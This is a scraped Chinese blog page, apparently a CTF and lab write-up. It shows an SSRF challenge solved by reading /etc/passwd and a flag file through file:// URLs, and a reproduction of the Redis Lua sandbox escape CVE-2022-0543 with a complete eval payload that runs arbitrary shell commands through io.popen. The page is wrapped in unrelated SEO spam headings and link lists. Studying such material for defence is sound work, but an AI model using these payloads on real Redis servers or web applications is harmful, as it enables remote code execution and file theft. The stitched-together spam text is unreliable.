当前位置: 首页 > news >正文

企业门户网站制作周期poedit wordpress

企业门户网站制作周期,poedit wordpress,如何打造平台,长春建设网站公司目录 一、i春秋题目 二、CVE-2022-0543:(redis沙盒逃逸) 漏洞介绍: 漏洞复现: 一、i春秋题目 靶标介绍: Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。 进入题目:…

目录

一、i春秋题目

二、CVE-2022-0543:(redis沙盒逃逸)

漏洞介绍:

漏洞复现:


一、i春秋题目

靶标介绍:

Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。

进入题目:

 SSRF漏洞:

后面加上题目给定的网站试试:

 可以跳转到百度页面:

 读取系统文件:IP/?url=file:///etc/passwd 

获取到flag /?url=file:///flag

 flag{e30bd2d5-b4e8-4635-858f-5aac6604cd9c}

二、CVE-2022-0543:(redis沙盒逃逸)

漏洞介绍:

        Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。

Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。

漏洞复现:

靶机
使用vulhub靶场: 

使用vulhub靶场安装完成后我们进入到对应目录:cd vulhub/redis/CVE-2022-0543/然后执行命令,进行靶场编译和运行docker-compose build
docker-compose up -d
运行完docker-compose后,打开我们的redis就是我们的漏洞环境了

先安装redis-cli:

kali安装redis-cli:apt-get update && apt-get upgrade  (更新源)apt install redis-tools

 redis-cli:

redis-cli -h 192.168.184.177//有漏洞IP

产生原因:

        该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。

        我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令:

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");local io = io_l();local f = io.popen("id", "r");local res = f:read("*a");f:close();return res


Payload: (执行命令id可以改变)

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

 id命令:

 whoami    pwd   ls  

 到这我们就可以执行命令了。

正式修复方案:Lua 初始化的末尾添加package=nil 

临时修复方案:关闭服务

http://www.yayakq.cn/news/599031/

相关文章:

  • 南京建站推广公司wordpress恢复安装失败
  • 做企业网站服务网站建设用户使用手册
  • 邻水县规划和建设局 网站东莞银行
  • 微网建设管理系统网站 优化手机版
  • 网站建设方案书写手机建立网站app
  • 南宁网站建设加q.479185700网页设计ui设计培训
  • 我想自己建个网站买货 怎么做wordpress标签别名转换
  • 网站建设基本概述网站开发质保
  • 支付宝 收费 网站开发蛋糕设计网站
  • wordpress迁移站点桔子seo查询
  • 大兴安岭网站推广有限责任公司法人承担什么责任
  • 电子商务网站课程设计总结服装购物商城网站建设
  • 怎么做招聘网站设计wordpress in排序
  • 华为做网站百度网站推广
  • wordpress插件去掉广告免费网站建设seo
  • 深圳建设信息网站wordpress破解防盗链
  • 建设网站用什么软件排版成都哪里好玩适合年轻人
  • 机关网站内容建设食品企业网站模板
  • 青岛网站建设效果个人域名邮箱怎么弄
  • 如何建设企业微网站关于做网站的策划方案
  • 网站seo相关设置优化数据分析报告
  • 做网站跟做APP哪个容易青岛网站建设哪个好
  • 六数字域名做网站好不好网站了建设
  • 广东网站设计专业团队桂林生活网官方网站
  • 简单 大气 网站模版工信部资质查询网站
  • 国外搜索网站排名室内装饰装修资质证书
  • 网站公司备案通知来宾网站优化
  • 网页设计商城网站建设男男做受网站
  • 珠海网站建站模板桐乡市城市规划建设局网站
  • 网站建设制作首页流程直播软件排名